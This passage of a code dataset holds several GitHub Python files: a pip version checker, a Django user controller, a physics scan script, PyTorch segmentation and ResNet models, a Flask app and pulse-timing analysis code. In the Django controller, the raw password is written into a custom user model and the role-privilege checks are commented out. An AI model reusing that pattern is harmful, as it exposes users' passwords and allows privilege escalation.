lvl=1)\n\n    @staticmethod\n    def check_version(current_version, is_beta_tester, is_force_check):\n        if EnvironmentUtils.need_check() or is_force_check:\n            # check pip\n            p = Popen(\"pip install poco==\", stdout=PIPE, stderr=PIPE, shell=True)\n            out, err = p.communicate()\n            if not len(err) == 0:\n                newest_version = EnvironmentUtils.parse_version(EnvironmentUtils.decode(err), is_beta_tester)\n            else:\n                # maybe installed from source\n                return\n            if version.parse(current_version) < version.parse(newest_version):\n                ColorPrint.print_warning(\"New version of poco is available. 
\\n \"\n \"Please upgrade with: pip install poco==\" + newest_version)\n elif is_force_check:\n ColorPrint.print_warning(\"Poco is up to date\")\n\n @staticmethod\n def parse_version(pip_content, is_beta_tester):\n \"\"\"PIP response variations and expected versions:\n * '(from versions: 0.0.1,0.0.2)' - noDev: 0.0.2 isDev: 0.0.2\n * '(from versions: 0.0.1.dev1,0.0.2)' - noDev: 0.0.2 isDev: 0.0.2\n * '(from versions: 0.0.1,0.0.2.dev1)' - noDev: 0.0.1 isDev: 0.0.2.dev1\n\n not dev support : ^.*\\\\(from versions:.*(\\\\d+.\\\\d+.\\\\d+)[\\\\),].*$\n is dev support : ^.*\\\\(from versions:.*(\\\\d+.\\\\d+.\\\\d+(\\\\.dev\\\\d+)?)[\\\\),].*$\n \"\"\"\n version_expression = \"^.*\\\\(from versions:.*(\\\\d+.\\\\d+.\\\\d+)[\\\\),].*$\"\n if is_beta_tester:\n version_expression = \"^.*\\\\(from versions:.*(\\\\d+.\\\\d+.\\\\d+(\\\\.dev\\\\d+)?)[\\\\),].*$\"\n matches = re.findall(version_expression, pip_content)\n\n pre_ver = matches[0] if len(matches) > 0 else \"0.0.0\"\n return pre_ver[0] if type(pre_ver) is tuple else pre_ver\n\n @staticmethod\n def decode(text_string):\n if sys.version_info[0] == 3:\n return text_string.decode(\"utf-8\")\n return text_string\n\n @staticmethod\n def need_check():\n directory = StateHolder.home_dir\n filename = \"latest_update_check_date\"\n latest_check_date = FileUtils.get_file_content(directory, filename)\n today = str(date.today())\n if (latest_check_date < today):\n FileUtils.write_to_file(directory, filename, today)\n return True\n return False\n","repo_name":"shiwaforce/poco","sub_path":"poco/services/environment_utils.py","file_name":"environment_utils.py","file_ext":"py","file_size_in_byte":4122,"program_lang":"python","lang":"en","doc_type":"code","stars":97,"dataset":"github-code","pt":"32"}
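The parse_version docstring in the environment_utils.py record above spells out the pip output variations its two regexes must handle. A standalone check of that behavior; the sample string below is an assumption modeled on the docstring, not captured pip output:

import re

sample = "(from versions: 0.0.1, 0.0.2.dev1, 0.0.2)"

stable_only = "^.*\\(from versions:.*(\\d+.\\d+.\\d+)[\\),].*$"
with_dev = "^.*\\(from versions:.*(\\d+.\\d+.\\d+(\\.dev\\d+)?)[\\),].*$"

# The greedy ^.* prefix makes each pattern capture the right-most version token.
print(re.findall(stable_only, sample))  # ['0.0.2']
print(re.findall(with_dev, sample))     # [('0.0.2', '')]

If the list ended in a dev release instead, only the second pattern would pick it up, which is exactly the difference the is_beta_tester flag toggles.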
+{"seq_id":"16157232832","text":"from django.contrib.auth.models import User\nfrom ..serializers import UsuarioSerializer\nfrom ..models import Puesto, Usuario, Rol, EstatusUsuario, Idioma\n\nclass ControllerUsuario:\n    def crearUsuario(request):\n        datosUsuario = request.data\n        print(request.data)\n        print(request)\n        try:\n            #usuarioRegistra = Usuario.objects.get(p_nombre=\"administrador\") \n            rol = Rol.objects.get(id_rol=datosUsuario['rol'])\n            puesto = Puesto.objects.get(id_puesto=datosUsuario['puesto'])\n            idioma = Idioma.objects.get(id_idioma=datosUsuario['idioma'])\n            estatus = EstatusUsuario.objects.get(id_estatus=datosUsuario['estatus'])\n            username = datosUsuario['username']\n            \n            # if usuarioRegistra.rol.scope.id_scope >= rol.scope.id_scope:\n            #     return {\"Error\":\"You do not have the privileges to register the user\"}\n\n            # if usuarioRegistra.rol.tipo_rol.id_tipo_rol >= rol.tipo_rol.id_tipo_rol:\n            #     return {\"Error\":\"You do not have the privileges to register the user\"}\n\n            usuario_duplicado = Usuario.objects.filter(username=username)\n            if usuario_duplicado.exists():\n                return {\"Error\":\"The username already exists in the database\"}\n            \n            \n            UsuarioNuevo = Usuario.objects.create(\n                username =username,\n                p_nombre = datosUsuario['p_nombre'],\n                p_apellido = datosUsuario['p_apellido'],\n                s_apellido= datosUsuario['s_apellido'],\n                email= datosUsuario['email'],\n                telefono = datosUsuario['telefono'], \n                password = datosUsuario['password'],\n                es_activo = datosUsuario['es_activo'],\n                rol = rol,\n                puesto = puesto,\n                idioma = idioma,\n                estatus = estatus,\n            )\n\n            # create_user hashes the password; a plain create() would store it in clear text\n            userNuevo = User.objects.create_user(\n                username = username,\n                email = datosUsuario['email'],\n                password = datosUsuario['password'],\n            )\n            \n        except Exception:\n            return {\"estatus\":\"Error\"}\n\n        return {\"estatus\":\"Ok\", 'nuevo_usuario': UsuarioNuevo.username}\n    \n    def listarUsuario(id_usuario=None):\n        if id_usuario:\n            try:\n                queryset = Usuario.objects.get(id_usuario=id_usuario)\n            except Usuario.DoesNotExist:\n                return ({'result': 'The requested user was not found'})\n            serializer = UsuarioSerializer(queryset)\n            return serializer.data\n        else:\n            queryset = Usuario.objects.all()\n            serializer = UsuarioSerializer(queryset, many=True)\n            return serializer.data\n\n    def verPerfil(p_nombre=None):\n        if p_nombre:\n            try:\n                queryset = Usuario.objects.get(p_nombre=p_nombre)\n            except Usuario.DoesNotExist:\n                return ({'result': 'The requested user was not found'})\n            serializer = UsuarioSerializer(queryset)\n            return serializer.data\n        else:\n            return ({'result': 'Enter the username'})\n\n\n    def modificarUsuario(request,id_usuario=None):\n        if id_usuario:\n            datosUsuario = request.data\n            try:\n                usuarioModificar = Usuario.objects.get(id_usuario=id_usuario)\n            except Usuario.DoesNotExist:\n                return ({'result': 'The requested user was not found'})\n            try:\n                #usuarioRegistra = Usuario.objects.get(p_nombre=\"administrador\") \n                rol = Rol.objects.get(id_rol=datosUsuario['rol'])\n                puesto = Puesto.objects.get(id_puesto=datosUsuario['puesto'])\n                idioma = Idioma.objects.get(id_idioma=datosUsuario['idioma'])\n                estatus = EstatusUsuario.objects.get(id_estatus=datosUsuario['estatus'])\n                username = datosUsuario['username']\n                \n                # if usuarioRegistra.rol.scope.id_scope >= rol.scope.id_scope:\n                #     return {\"Error\":\"You do not have the privileges to register the user\"}\n\n                # if usuarioRegistra.rol.tipo_rol.id_tipo_rol >= rol.tipo_rol.id_tipo_rol:\n                #     return {\"Error\":\"You do not have the privileges to register the user\"}\n\n                usuario_duplicado = Usuario.objects.filter(username=username).exclude(id_usuario=id_usuario)\n\n                if usuario_duplicado.exists():\n                    return {\"Error\":\"The username already exists in the database\"}\n                \n                usuarioModificar.username = username\n                usuarioModificar.p_nombre = datosUsuario['p_nombre']\n                usuarioModificar.p_apellido = datosUsuario['p_apellido']\n                usuarioModificar.s_apellido= datosUsuario['s_apellido']\n                usuarioModificar.email= datosUsuario['email']\n                usuarioModificar.telefono = datosUsuario['telefono'] \n                usuarioModificar.password = datosUsuario['password']\n                usuarioModificar.es_activo = datosUsuario['es_activo']\n                usuarioModificar.rol = rol\n                usuarioModificar.puesto = puesto\n                usuarioModificar.idioma = idioma\n                usuarioModificar.estatus = estatus\n                \n                usuarioModificar.save()\n                \n            except Exception:\n                return {\"estatus\":\"Error\"}\n\n            return {\"estatus\":\"Ok\", 'Usuario_modificado': usuarioModificar.username}\n        else: \n            return {\"result\":\"Enter the Id of the user you want to modify\"}","repo_name":"raquelnany/ACTIVO_DJANGO_DOCKER_PROGRES","sub_path":"app/core/controller/ControllerUsuario.py","file_name":"ControllerUsuario.py","file_ext":"py","file_size_in_byte":5705,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
+{"seq_id":"18744116964","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on 29/06/18\n\n@author: HarryS\n\"\"\"\n\nfrom scanning_functions import *\n\n\ndef run_scan(param_dict, args):\n    \"\"\"\n    Given points defined in param_dict, create run point directories\n    and populate them with a Herwig .in file and a params.dat file.\n\n    Parameters\n    ----------\n\n    param_dict: dict\n        Dictionary with parameter names as keys, each containing another\n        dictionary with keys 'range' and 'values'.\n\n    args: argparse.Namespace object\n        Argparse object with attributes containing command line options.\n\n    Returns\n    -------\n\n    None\n\n    \"\"\"\n\n    # Read in run card template files\n    template = read_template_file(args.template_file)\n\n    make_directory(args.out_dir)\n    for run_point in range(args.num_points):\n        # Run point directories are inside the output directory and hold\n        # the necessary files to run Herwig with the param_dict associated\n        # with that point\n        run_point_path = make_run_point_directory(run_point, args.out_dir)\n\n        # Write params.dat file inside run point directory. This is purely to\n        # record what the param_dict values are at this run point\n        write_param_file(param_dict, run_point_path, run_point)\n\n        # Write run card template files formatted with parameter values\n        write_template_files(template, param_dict, run_point,\n                             run_point_path, args.param_file)\n\n    # Write all sampled points and their run points to a .dat file\n    write_sampled_points(args.out_dir)\n","repo_name":"hsaunders1904/contur","sub_path":"AnalysisTools/contur/contur/Scanning/scan.py","file_name":"scan.py","file_ext":"py","file_size_in_byte":1533,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
+{"seq_id":"8444128579","text":"\"\"\"\"\nCode is modified based on : https://github.com/lxtGH/PFSegNets\n\"\"\"\n\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nfrom Nets.SGFANet.mynn import Norm2d\nfrom Nets.ground_transformer import GroundTrans\n\n\ndef point_sample(input, point_coords, **kwargs):\n \"\"\"\n A wrapper around :function:`torch.nn.functional.grid_sample` to support 3D point_coords tensors.\n Unlike :function:`torch.nn.functional.grid_sample` it assumes `point_coords` to lie inside\n [0, 1] x [0, 1] square.\n\n Args:\n input (Tensor): A tensor of shape (N, C, H, W) that contains features map on a H x W grid.\n point_coords (Tensor): A tensor of shape (N, P, 2) or (N, Hgrid, Wgrid, 2) that contains\n [0, 1] x [0, 1] normalized point coordinates.\n\n Returns:\n output (Tensor): A tensor of shape (N, C, P) or (N, C, Hgrid, Wgrid) that contains\n features for points in `point_coords`. The features are obtained via bilinear\n interplation from `input` the same way as :function:`torch.nn.functional.grid_sample`.\n \"\"\"\n add_dim = False\n if point_coords.dim() == 3:\n add_dim = True\n point_coords = point_coords.unsqueeze(2)\n output = F.grid_sample(input, 2.0 * point_coords - 1.0, **kwargs)\n if add_dim:\n output = output.squeeze(3)\n return output\n\n\ndef get_uncertain_point_coords_on_grid(uncertainty_map, num_points):\n \"\"\"\n Find `num_points` most uncertain points from `uncertainty_map` grid.\n\n Args:\n uncertainty_map (Tensor): A tensor of shape (N, 1, H, W) that contains uncertainty\n values for a set of points on a regular H x W grid.\n num_points (int): The number of points P to select.\n\n Returns:\n point_indices (Tensor): A tensor of shape (N, P) that contains indices from\n [0, H x W) of the most uncertain points.\n point_coords (Tensor): A tensor of shape (N, P, 2) that contains [0, 1] x [0, 1] normalized\n coordinates of the most uncertain points from the H x W grid.\n \"\"\"\n R, _, H, W = uncertainty_map.shape\n h_step = 1.0 / float(H)\n w_step = 1.0 / float(W)\n\n num_points = min(H * W, num_points)\n point_indices = torch.topk(uncertainty_map.view(R, H * W), k=num_points, dim=1)[1]\n point_coords = torch.zeros(R, num_points, 2, dtype=torch.float, device=uncertainty_map.device)\n point_coords[:, :, 0] = w_step / 2.0 + (point_indices % W).to(torch.float) * w_step\n point_coords[:, :, 1] = h_step / 2.0 + (point_indices // W).to(torch.float) * h_step\n return point_indices, point_coords\n\n\nclass PointFlowModuleWithCornerEdgeSampling(nn.Module):\n def __init__(self, in_planes, dim=64, matcher_kernel_size=3,\n edge_points=32, corner_points=32, gated=False, gt_tag=True):\n super(PointFlowModuleWithCornerEdgeSampling, self).__init__()\n self.dim = dim\n self.down_h = nn.Conv2d(in_planes, dim, 1)\n self.down_l = nn.Conv2d(in_planes, dim, 1)\n self.softmax = nn.Softmax(dim=-1)\n self.edge_points = edge_points\n self.corner_points = corner_points\n self.gated = gated\n self.gt_tag = gt_tag\n if self.gt_tag:\n self.gt = GroundTrans(in_channels=in_planes, dimension=2)\n print(\"Ground Transformer\")\n print(f\"edge points:{self.edge_points},corner points:{self.corner_points}\")\n if self.gated:\n print(\"weight gate is added\")\n self.channel_gate = nn.Sequential(nn.Linear(in_planes, in_planes), nn.Dropout(0.1), nn.ReLU(),\n nn.Linear(in_planes, in_planes), nn.Sigmoid())\n self.feature_inportance = nn.Sequential(nn.Linear(in_planes, in_planes), nn.Dropout(0.1), nn.ReLU(),\n nn.Linear(in_planes, 1), nn.Sigmoid())\n self.edge_final = 
nn.Sequential(\n nn.Conv2d(in_channels=in_planes, out_channels=in_planes, kernel_size=3, padding=1, bias=False),\n Norm2d(in_planes),\n nn.ReLU(),\n nn.Conv2d(in_channels=in_planes, out_channels=1, kernel_size=3, padding=1, bias=False)\n )\n self.corner_final = nn.Sequential(\n nn.Conv2d(in_channels=in_planes, out_channels=in_planes, kernel_size=3, padding=1, bias=False),\n Norm2d(in_planes),\n nn.ReLU(),\n nn.Conv2d(in_channels=in_planes, out_channels=1, kernel_size=1, bias=False)\n )\n\n def forward(self, x):\n\n x_high, x_low = x # 8,8 16,16\n\n stride_ratio = x_low.shape[2] / x_high.shape[2]\n N, C, H, W = x_low.shape\n N_h, C_h, H_h, W_h = x_high.shape\n\n # edge part\n x_high_edge = x_high\n edge_pred = self.edge_final(x_high_edge)\n point_indices, point_coords = get_uncertain_point_coords_on_grid(edge_pred,\n num_points=self.edge_points) # torch.Size([2, K, 2])\n sample_x = point_indices % W_h * stride_ratio\n sample_y = point_indices // W_h * stride_ratio\n low_edge_indices = sample_x + sample_y * W\n low_edge_indices = low_edge_indices.unsqueeze(1).expand(-1, C, -1).long()\n high_edge_feat = point_sample(x_high, point_coords) # torch.Size([2, 256, K])\n low_edge_feat = point_sample(x_low, point_coords)\n if self.gated:\n high_edge_feat = self.channel_gate(high_edge_feat.permute(0, 2, 1)) * high_edge_feat.permute(0, 2, 1)\n high_edge_feat = high_edge_feat.permute(0, 2, 1)\n low_edge_feat = self.channel_gate(low_edge_feat.permute(0, 2, 1)) * low_edge_feat.permute(0, 2, 1)\n low_edge_feat = low_edge_feat.permute(0, 2, 1)\n affinity_edge = torch.bmm(high_edge_feat.transpose(2, 1), low_edge_feat).transpose(2, 1)\n affinity = self.softmax(affinity_edge)\n high_edge_feat = torch.bmm(affinity, high_edge_feat.transpose(2, 1)).transpose(2, 1)\n if self.gated:\n f_i = self.feature_inportance(high_edge_feat.permute(0, 2, 1))\n f_i = f_i.permute(0, 2, 1)\n fusion_edge_feat = f_i * high_edge_feat + (1 - f_i) * low_edge_feat\n else:\n fusion_edge_feat = high_edge_feat + low_edge_feat\n\n # corner part\n x_high_corner = x_high\n corner_pred = self.corner_final(x_high_corner)\n corner_point_indices, corner_point_coords = get_uncertain_point_coords_on_grid(corner_pred,\n num_points=self.corner_points)\n corner_sample_x = corner_point_indices % W_h * stride_ratio\n corner_sample_y = corner_point_indices // W_h * stride_ratio\n low_corner_indices = corner_sample_x + corner_sample_y * W\n low_corner_indices = low_corner_indices.unsqueeze(1).expand(-1, C, -1).long()\n high_corner_feat = point_sample(x_high, corner_point_coords)\n low_corner_feat = point_sample(x_low, corner_point_coords)\n if self.gated:\n high_corner_feat = self.channel_gate(high_corner_feat.permute(0, 2, 1)) * high_corner_feat.permute(0, 2, 1)\n high_corner_feat = high_corner_feat.permute(0, 2, 1)\n low_corner_feat = self.channel_gate(low_corner_feat.permute(0, 2, 1)) * low_corner_feat.permute(0, 2, 1)\n low_corner_feat = low_corner_feat.permute(0, 2, 1)\n affinity_corner = torch.bmm(high_corner_feat.transpose(2, 1), low_corner_feat).transpose(2, 1)\n affinity_corner = self.softmax(affinity_corner)\n high_corner_feat = torch.bmm(affinity_corner, high_corner_feat.transpose(2, 1)).transpose(2, 1)\n if self.gated:\n f_i_c = self.feature_inportance(high_corner_feat.permute(0, 2, 1))\n f_i_c = f_i_c.permute(0, 2, 1)\n fusion_corner_feat = f_i_c * high_corner_feat + (1 - f_i_c) * low_corner_feat\n else:\n fusion_corner_feat = high_corner_feat + low_corner_feat\n\n # GT Part\n if self.gt_tag == True:\n x_low = self.gt(x_low, x_high)\n\n 
final_features = x_low.reshape(N, C, H * W).scatter(2, low_edge_indices, fusion_edge_feat) # edge\n final_features = final_features.scatter(2, low_corner_indices, fusion_corner_feat) # corner\n final_features = final_features.view(N, C, H, W) #\n return final_features, edge_pred, corner_pred\n # end\n","repo_name":"zpl99/SGFANet","sub_path":"Nets/SGFANet/point_flow.py","file_name":"point_flow.py","file_ext":"py","file_size_in_byte":8407,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"}
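The point_flow.py record above combines two building blocks: top-k selection of the most uncertain grid cells and bilinear sampling of features at those normalized coordinates. A toy, torch-only sketch of that convention; the shapes and values are illustrative, not taken from the original network:

import torch
import torch.nn.functional as F

# 1x1x4x4 "uncertainty" map; take the 3 highest-scoring cells
umap = torch.arange(16, dtype=torch.float32).reshape(1, 1, 4, 4)
R, _, H, W = umap.shape
idx = torch.topk(umap.view(R, H * W), k=3, dim=1)[1]

# Convert flat indices to (x, y) in [0, 1], sampled at pixel centers
coords = torch.zeros(R, 3, 2)
coords[..., 0] = 0.5 / W + (idx % W).float() / W
coords[..., 1] = 0.5 / H + torch.div(idx, W, rounding_mode="floor").float() / H

# grid_sample expects coordinates in [-1, 1], hence the 2 * coords - 1 rescale
feats = torch.rand(1, 8, 4, 4)
sampled = F.grid_sample(feats, (2.0 * coords - 1.0).unsqueeze(2), align_corners=False)
print(sampled.squeeze(3).shape)  # torch.Size([1, 8, 3]): one feature column per chosen point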
+{"seq_id":"70914035610","text":"#!/usr/bin/python3\n\"\"\"Flask web application\nMust be listening on 0.0.0.0, port 5000\n\"\"\"\nfrom models import storage\nfrom flask import Flask\nfrom flask import render_template\n\napp = Flask(__name__)\n\n\n@app.route(\"/states\", strict_slashes=False)\ndef states():\n    \"\"\"Displays list of all State on HTML page\n    \"\"\"\n    states = storage.all(\"State\")\n    return render_template(\"9-states.html\", state=states)\n\n\n@app.route(\"/states/<id>\", strict_slashes=False)\ndef states_id(id):\n    \"\"\"Displays a State with a given id on HTML page\"\"\"\n    for state in storage.all(\"State\").values():\n        if state.id == id:\n            return render_template(\"9-states.html\", state=state)\n    return render_template(\"9-states.html\")\n\n\n@app.teardown_appcontext\ndef teardown(exc):\n    \"\"\"Remove current SQLAlchemy session\"\"\"\n    storage.close()\n\n\nif __name__ == \"__main__\":\n    app.run(host=\"0.0.0.0\")\n","repo_name":"mesihg/AirBnB_clone_v2","sub_path":"web_flask/9-states.py","file_name":"9-states.py","file_ext":"py","file_size_in_byte":880,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
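The second route in the 9-states.py record depends on Flask's <id> variable rule, which hands the URL segment to the view as a keyword argument. A self-contained sketch of the mechanism; the app and route names here are invented for illustration:

from flask import Flask

demo = Flask(__name__)

@demo.route("/states/<id>", strict_slashes=False)
def show_state(id):
    # the <id> placeholder in the rule arrives as the `id` argument
    return "state {}".format(id)

with demo.test_client() as client:
    print(client.get("/states/abc123").data)  # b'state abc123'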
+{"seq_id":"15698421047","text":"from models.select_channels import ChannelSelection\nimport torch.nn as nn\nimport torch\nimport math\n\n\n# [conv1in, conv1out=conv2in, conv2out=conv3in] (conv3out=planes*expansion)\n# cfg the channels after bn\ndefaultcfg = [[16, 16, 16], [64, 16, 16]*(18-1), [64, 32, 32], [128, 32, 32]*(18-1), [128, 64, 64],\n [256, 64, 64]*(18-1), [256]]\n\n__all__ = ['resnet164']\n\n\nclass Bottleneck(nn.Module):\n expansion = 4\n\n def __init__(self, inplanes, planes, cfg, stride):\n super(Bottleneck, self).__init__()\n self.expansion = Bottleneck.expansion\n\n self.bn1 = nn.BatchNorm2d(inplanes)\n self.select = ChannelSelection(inplanes)\n self.conv1 = nn.Conv2d(cfg[0], cfg[1], kernel_size=1, stride=1, bias=False)\n\n self.bn2 = nn.BatchNorm2d(cfg[1])\n self.conv2 = nn.Conv2d(cfg[1], cfg[2], kernel_size=3, stride=stride, padding=1, bias=False)\n\n self.bn3 = nn.BatchNorm2d(cfg[2])\n self.conv3 = nn.Conv2d(cfg[2], planes * self.expansion, kernel_size=1, stride=1, bias=False)\n\n self.relu = nn.ReLU(inplace=True)\n self.downsample = nn.Identity()\n if stride != 1 or inplanes != planes * self.expansion:\n self.downsample = nn.Conv2d(inplanes, planes * self.expansion, kernel_size=1, stride=stride, bias=False)\n\n def forward(self, x):\n residual = self.downsample(x)\n\n out = self.bn1(x)\n out = self.select(out)\n out = self.relu(out)\n out = self.conv1(out)\n\n out = self.bn2(out)\n out = self.relu(out)\n out = self.conv2(out)\n\n out = self.bn3(out)\n out = self.relu(out)\n out = self.conv3(out)\n\n out += residual\n return out\n\n\nclass ResNet(nn.Module):\n def __init__(self, num_class, cfg=None):\n super(ResNet, self).__init__()\n self.inplanes = 16\n if cfg is None:\n cfg = [item for sublist in defaultcfg for item in sublist]\n\n self.conv1 = nn.Conv2d(3, 16, 3, 1, 1, bias=False)\n self.stage1 = self.make_layers(Bottleneck, 16, 18, cfg[0: 18 * 3], 1)\n self.stage2 = self.make_layers(Bottleneck, 32, 18, cfg[18 * 3: 2 * 18 * 3], 2)\n self.stage3 = self.make_layers(Bottleneck, 64, 18, cfg[2 * 18 * 3: 3 * 18 * 3], 2)\n self.bn = nn.BatchNorm2d(64 * Bottleneck.expansion)\n self.select = ChannelSelection(64 * Bottleneck.expansion)\n self.relu = nn.ReLU(inplace=True)\n self.avgpool = nn.AdaptiveAvgPool2d(1)\n self.fc = nn.Linear(cfg[-1], num_class)\n self._init_weights()\n\n def make_layers(self, Block, planes, blocks, cfg, stride):\n layers = []\n layers += [Block(self.inplanes, planes, cfg[0: 3], stride)]\n self.inplanes = planes * Block.expansion\n for i in range(1, blocks):\n layers += [Block(self.inplanes, planes, cfg[i * 3: i * 3 + 3], 1)]\n\n return nn.Sequential(*layers)\n\n def _init_weights(self):\n for m in self.modules():\n if isinstance(m, nn.Conv2d):\n n = m.kernel_size[0] * m.kernel_size[1] * m.out_channels\n m.weight.data.normal_(0, math.sqrt(2.0 / n))\n if m.bias is not None:\n m.bias.data.zero_()\n elif isinstance(m, nn.BatchNorm2d):\n m.weight.data.fill_(0.5)\n m.bias.data.zero_()\n elif isinstance(m, nn.Linear):\n m.bias.data.zero_()\n m.weight.data.normal_(0, 0.01)\n\n def forward(self, x):\n out = self.conv1(x)\n\n out = self.stage1(out)\n out = self.stage2(out)\n out = self.stage3(out)\n\n out = self.bn(out)\n out = self.select(out)\n out = self.relu(out)\n\n out = self.avgpool(out)\n out = out.view(out.size(0), -1)\n out = self.fc(out)\n\n return out\n\n\ndef resnet164(cfg=None, num_class=100):\n return ResNet(num_class, cfg)\n\n\n# net = resnet164()\n# x = torch.rand(1, 3, 32, 32)\n# y = net(x)\n# print(y.shape)\n# for m in 
net.stage1[0].modules():\n# print(m)\n# print(net.stage1[0])\n\n","repo_name":"EstherBear/implementation-of-network-slimming","sub_path":"models/resnet.py","file_name":"resnet.py","file_ext":"py","file_size_in_byte":4051,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"32"}
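A short usage sketch for the resnet164 factory above, echoing the commented-out shape check at the end of the record; it assumes the models.select_channels dependency is importable alongside the module:

import torch

net = resnet164(num_class=100)   # factory defined in the module above
x = torch.rand(2, 3, 32, 32)     # CIFAR-sized input batch
print(net(x).shape)              # torch.Size([2, 100]): cfg[-1] = 256 feeds the final Linear
print(sum(p.numel() for p in net.parameters()) / 1e6, "M parameters")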
+{"seq_id":"31517805329","text":"\"\"\"Time of Arrival Analysis.\"\"\"\n\nimport logging\nimport random\nimport warnings\nfrom pathlib import Path\nfrom typing import List\n\nimport numpy as np\nfrom numba import jit\nfrom numba.core.errors import NumbaPendingDeprecationWarning\nfrom tqdm import tqdm\n\nLOG_FORMAT: str = \"[%(asctime)s] %(levelname)s \"\nLOG_FORMAT += \"%(module)s::%(funcName)s():l%(lineno)d: \"\nLOG_FORMAT += \"%(message)s\"\nlogging.basicConfig(format=LOG_FORMAT, level=logging.ERROR)\nlog = logging.getLogger(__name__)\n# Supress deprecation messages\nwarnings.filterwarnings(action=\"ignore\", category=DeprecationWarning)\nwarnings.filterwarnings(action=\"ignore\", category=NumbaPendingDeprecationWarning)\nwarnings.filterwarnings(action=\"ignore\", category=UserWarning)\n\nFACTORIAL_LOOKUP_TABLE = np.array(\n [\n 1,\n 1,\n 2,\n 6,\n 24,\n 120,\n 720,\n 5040,\n 40320,\n 362880,\n 3628800,\n 39916800,\n 479001600,\n 6227020800,\n 87178291200,\n 1307674368000,\n 20922789888000,\n 355687428096000,\n 6402373705728000,\n 121645100408832000,\n 2432902008176640000,\n ],\n dtype=\"int64\",\n)\n\n\ndef frequency_grid(\n resolution: float = 0.00786432,\n samples: float = 536.0,\n oversample: int = 5,\n) -> np.ndarray:\n \"\"\"\n Generate frequency grid.\n\n Parameters\n ----------\n resolution : float, optional\n [description], by default 0.00786432\n samples : float, optional\n [description], by default 536.0\n oversample : int, optional\n [description], by default 5\n\n Returns\n -------\n np.ndarray\n [description]\n \"\"\"\n spacing = 1.0 / (samples * resolution)\n nyquist = 0.5 * (1.0 / resolution)\n return np.arange(\n spacing,\n nyquist + (spacing / oversample),\n (spacing / oversample),\n )\n\n\n@jit(nopython=True)\ndef parameters(\n arrivals: List[float],\n chi: float,\n simulations: int = int(1e6),\n):\n \"\"\"\n Calculate the parameters for the workload .\n\n Parameters\n ----------\n arrivals : List[float]\n [description]\n chi : float\n [description]\n processors : int\n [description]\n simulations : int, optional\n [description], by default int(1e6)\n\n Returns\n -------\n [type]\n [description]\n \"\"\"\n # Convert\n toas = np.array(arrivals) * 0.001\n # np.empty is ~100x faster than np.zeros\n errors = np.zeros(len(toas)) * 0.001\n differences = np.zeros(len(toas) - 1)\n\n for index in np.arange(0, len(toas) - 1, 1):\n differences[index] = toas[index + 1] - toas[index]\n\n minimum = chi * differences.mean()\n maximum = (2.0 - chi) * differences.mean()\n return toas, errors, differences, minimum, maximum\n\n\n@jit(nopython=True)\ndef z2search(toas: np.ndarray, errors: np.ndarray, grid: np.ndarray) -> np.ndarray:\n \"\"\"\n Lightcurve search.\n\n Parameters\n ----------\n toas : np.ndarray\n [description]\n errors : np.ndarray\n [description]\n grid : np.ndarray\n [description]\n\n Returns\n -------\n np.ndarray\n [description]\n \"\"\"\n z1 = np.zeros(grid.size, dtype=np.float64)\n for index in np.arange(0, len(grid), 1):\n phase = pulse_phase(toas, grid[index])\n z1[index] = z_n(phase, n=1)\n return z1\n\n\n@jit(nopython=True)\ndef pulse_phase(times, *frequency_derivatives):\n \"\"\"\n Calculate pulse phase from the frequency and its derivatives.\n\n Parameters\n ----------\n times : array of floats\n The times at which the phase is calculated\n *frequency_derivatives: floats\n List of derivatives in increasing order, starting from zero.\n\n Returns\n -------\n phases : array of floats\n The absolute pulse phase\n \"\"\"\n phase = np.zeros(len(times))\n for i_f, f in 
enumerate(frequency_derivatives):\n factorial = fast_factorial(i_f + 1)\n phase += 1 / factorial * times ** (i_f + 1) * f\n phase -= np.floor(phase)\n return phase\n\n\n@jit(nopython=True)\ndef fast_factorial(value: np.int64) -> np.int64:\n \"\"\"\n Factorial.\n\n Parameters\n ----------\n value : np.int64\n Some integer value.\n\n Returns\n -------\n np.int64\n\n Raises\n ------\n ValueError\n When value > 20.\n \"\"\"\n if value > 20:\n raise ValueError(\"fast_factorial for n>20, not supported.\")\n return FACTORIAL_LOOKUP_TABLE[value]\n\n\n@jit(nopython=True)\ndef z_n(phase: np.ndarray, n: int = 2, norm: float = 1.0):\n \"\"\"Z^2_n statistics, a` la Buccheri+03, A&A, 128, 245, eq. 2.\n\n Parameters\n ----------\n phase : array of floats\n The phases of the events\n n : int, default 2\n Number of harmonics, including the fundamental\n norm : float or array of floats\n A normalization factor that gets multiplied as a weight.\n\n Returns\n -------\n z2_n : float\n The Z^2_n statistics of the events.\n \"\"\"\n nbin = len(phase)\n if nbin == 0:\n return 0\n normalization = np.array(norm)\n if normalization.size == 1:\n total_norm = nbin * normalization\n else:\n total_norm = np.sum(normalization)\n phase = phase * 2 * np.pi\n return 2.0 / total_norm * statistic(n, phase, normalization)\n\n\n@jit(nopython=True)\ndef statistic(n, phase, norm):\n \"\"\"Calculate Z^2 Statistic.\"\"\"\n stat = np.zeros(n + 1, dtype=np.float64)\n for k in range(1, n + 1):\n stat[k - 1] = (\n np.sum(np.cos(k * phase) * norm) ** 2\n + np.sum(np.sin(k * phase) * norm) ** 2\n )\n return np.sum(stat)\n\n\n@jit(nopython=True)\ndef simulate(simulations: int, differences: np.ndarray, minimum: int, maximum: int):\n \"\"\"\n Generate simulated observations.\n\n Parameters\n ----------\n simulations : int\n [description]\n differences : np.ndarray\n [description]\n minimum : int\n [description]\n maximum : int\n [description]\n\n Returns\n -------\n [type]\n [description]\n \"\"\"\n differences_mc = np.zeros((int(simulations), len(differences)))\n toas_mc = np.zeros((int(simulations), len(differences) + 1))\n errors_mc = np.zeros((int(simulations), len(differences) + 1))\n\n for index in np.arange(0, int(simulations), 1):\n differences_mc[index] = np.random.uniform(minimum, maximum, len(differences))\n\n for index in np.arange(0, len(differences_mc), 1):\n toas_mc[index, 1:] = np.cumsum(differences_mc[index, :])\n\n return differences_mc, toas_mc, errors_mc\n\n\ndef save(data: np.ndarray, savepath: Path) -> None:\n \"\"\"\n Save np.ndarray.\n\n Parameters\n ----------\n data : np.ndarray\n savepath : Path\n \"\"\"\n filename = savepath.absolute().as_posix()\n np.savez(filename, 